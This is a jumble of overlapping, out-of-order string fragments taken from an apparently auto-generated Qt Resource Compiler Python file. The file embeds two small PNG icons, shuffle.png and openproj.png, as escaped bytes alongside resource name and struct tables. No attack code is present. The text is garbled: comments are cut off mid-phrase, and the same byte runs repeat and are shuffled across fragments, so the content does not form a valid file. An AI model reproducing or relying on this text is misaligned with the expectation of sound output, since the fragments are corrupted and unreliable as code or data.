"\\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\",
"Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\",
"\\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\",
"\\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\",
"# Created by: object code # Created by: The Resource Compiler for Qt",
"8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\",
"b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a",
"\\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\",
"3) # Created by: object code # Created by: The Resource Compiler for",
"%\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\",
"\\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\",
"The Resource Compiler for Qt version 6.2.2 # WARNING! All changes made in",
".\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\",
"\" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\",
"]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\",
"\\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\",
"by: object code # Created by: The Resource Compiler for Qt version 6.2.2",
"\\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\",
"^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\",
"\\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name",
"Compiler for Qt version 6.2.2 # WARNING! All changes made in this file",
"\\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\",
"-\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\",
"\\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\",
"*\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\",
"\\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\",
"\\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\",
"+\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\",
"\\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\",
"Created by: object code # Created by: The Resource Compiler for Qt version",
"= b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources():",
